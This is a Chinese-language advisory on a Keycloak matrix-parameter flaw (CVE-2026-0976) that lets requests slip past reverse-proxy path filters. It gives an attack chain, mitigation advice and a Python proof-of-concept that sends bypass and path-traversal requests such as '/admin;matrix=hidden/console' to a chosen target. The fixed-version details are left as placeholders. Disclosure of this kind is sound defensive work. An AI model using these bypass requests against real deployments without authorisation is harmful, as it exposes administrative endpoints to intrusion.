CVE-2026-0976 Keycloak矩阵参数注入绕过代理路径过滤漏洞

漏洞信息

漏洞编号

CVE-2026-0976

漏洞类型

不当输入验证

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Keycloak

漏洞概述

CVE-2026-0976是Keycloak中的一个输入验证漏洞，CVSS评分3.7，严重等级为低危。该漏洞源于Keycloak接受符合RFC标准的矩阵参数（Matrix Parameters）嵌入在URL路径段中，而大多数反向代理（如Nginx、Apache）的默认配置会忽略或错误处理这些矩阵参数。攻击者可以利用这一特性构造特殊的HTTP请求，通过在路径中插入矩阵参数来掩盖真实的路径信息，从而绕过代理层的访问控制和安全过滤规则。这可能导致原本被网络隔离或通过代理规则限制访问的管理端点、敏感接口被意外暴露，给系统带来潜在的安全风险。漏洞由Red Hat安全团队（[email protected]）发现并披露。

技术细节

该漏洞的技术核心在于URL矩阵参数的解析差异。矩阵参数是RFC 3986中定义的一种URL语法，格式为path;param=value。Keycloak作为Java应用，正确实现了RFC标准，会解析并处理URL中的矩阵参数。然而，大多数反向代理服务器（如Nginx、Apache）在进行路径匹配、路由转发或访问控制时，默认不会解析矩阵参数，而是将其视为路径的一部分或直接忽略。攻击者可以利用这一差异构造请求，例如：/admin;matrix=hidden/console绕过仅配置/admin路径限制的代理规则，因为代理看到的路径为/admin;matrix=hidden/console（可能匹配或被错误处理），而Keycloak实际解析的路径为/admin。这种路径混淆攻击允许攻击者访问本应被代理层阻止的敏感端点，如管理后台、API接口等。攻击者还可以使用多个矩阵参数进一步混淆路径结构。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标Keycloak实例及其部署架构，确认使用了反向代理（Nginx/Apache）进行访问控制

STEP 2

步骤2

代理规则分析：攻击者探测代理层的路径过滤规则，例如发现/admin路径被代理规则阻止访问

STEP 3

步骤3

构造恶意请求：攻击者利用Keycloak对RFC兼容矩阵参数的支持，在URL路径段中注入矩阵参数，如/admin;matrix=hidden/console

STEP 4

步骤4

代理层处理：反向代理收到请求后，可能将整个路径（包括矩阵参数）视为统一字符串进行匹配，或直接忽略矩阵参数，导致绕过成功

STEP 5

步骤5

Keycloak解析：Keycloak正确解析RFC标准，将矩阵参数与路径分离，实际处理的路径为/admin，成功访问敏感端点

STEP 6

步骤6

权限提升：攻击者可能通过此绕过访问管理后台、API接口等敏感资源，进一步实施数据窃取或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-0976 PoC - Matrix Parameter Injection Bypass
# Target: Keycloak with reverse proxy that ignores matrix parameters
# Affected: Proxy path filtering bypass

import requests
import sys

def test_matrix_parameter_bypass(base_url, protected_endpoint):
    """
    Test for matrix parameter injection vulnerability
    Keycloak accepts RFC-compliant matrix parameters that proxies may ignore
    """
    
    # Normal request (blocked by proxy)
    normal_url = f"{base_url}{protected_endpoint}"
    
    # Bypass attempt using matrix parameter
    # The matrix parameter is embedded in the path segment
    bypass_url = f"{base_url}{protected_endpoint};matrix=hidden/console"
    
    headers = {
        "User-Agent": "CVE-2026-0976-PoC-Tester",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9"
    }
    
    print(f"[*] Testing CVE-2026-0976 Matrix Parameter Injection")
    print(f"[*] Target: {base_url}")
    print(f"[*] Protected Endpoint: {protected_endpoint}")
    print()
    
    # Test normal request
    print(f"[1] Testing normal request: {normal_url}")
    try:
        resp1 = requests.get(normal_url, headers=headers, timeout=10, allow_redirects=False)
        print(f"    Status: {resp1.status_code}")
    except requests.RequestException as e:
        print(f"    Error: {e}")
    
    print()
    
    # Test bypass request with matrix parameter
    print(f"[2] Testing bypass request: {bypass_url}")
    try:
        resp2 = requests.get(bypass_url, headers=headers, timeout=10, allow_redirects=False)
        print(f"    Status: {resp2.status_code}")
        
        if resp2.status_code == 200:
            print(f"    [VULNERABLE] Matrix parameter bypass may have worked!")
            print(f"    Response length: {len(resp2.content)} bytes")
        elif resp2.status_code in [301, 302, 303, 307, 308]:
            print(f"    [POTENTIAL] Redirect detected - check Location header")
            print(f"    Location: {resp2.headers.get('Location', 'N/A')}")
        else:
            print(f"    Request blocked or not found")
    except requests.RequestException as e:
        print(f"    Error: {e}")
    
    # Additional test cases with various matrix parameters
    test_cases = [
        f"{protected_endpoint};auth=admin",
        f"{protected_endpoint};x=/../admin",
        f"{protected_endpoint};bypass=true/../../../admin",
    ]
    
    print()
    print("[3] Testing additional bypass variations:")
    for i, test_path in enumerate(test_cases, 1):
        test_url = f"{base_url}{test_path}"
        print(f"    Test {i}: {test_url}")
        try:
            resp = requests.get(test_url, headers=headers, timeout=10, allow_redirects=False)
            print(f"         Status: {resp.status_code}")
        except requests.RequestException as e:
            print(f"         Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve_2026_0976_poc.py <base_url> <protected_endpoint>")
        print("Example: python cve_2026_0976_poc.py http://target.com /admin")
        sys.exit(1)
    
    base_url = sys.argv[1].rstrip('/')
    protected_endpoint = sys.argv[2]
    test_matrix_parameter_bypass(base_url, protected_endpoint)

影响范围

Keycloak < 特定修复版本（需查看官方公告）

建议参考 Red Hat Security Advisory RHSA-XXXX 或 Keycloak 官方安全公告获取确切版本信息

防御指南

临时缓解措施

临时缓解措施：1）在反向代理配置中添加规则，拒绝URL路径中包含分号（;）字符的请求，或在分号处截断路径；2）为所有敏感端点配置额外的IP白名单或强认证机制；3）在WAF中部署规则检测矩阵参数注入特征；4）监控并告警异常的路径访问尝试；5）考虑临时限制Keycloak管理后台的网络可达性，仅允许通过跳板机或VPN访问。建议同时关注Red Hat和Keycloak官方安全公告，获取正式补丁后尽快升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0976
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0976
3 Details https://www.cvedetails.com/cve/CVE-2026-0976/
4 VulDB https://vuldb.com/cve/CVE-2026-0976
5 Link https://access.redhat.com/security/cve/CVE-2026-0976
6 Link https://bugzilla.redhat.com/show_bug.cgi?id=2429869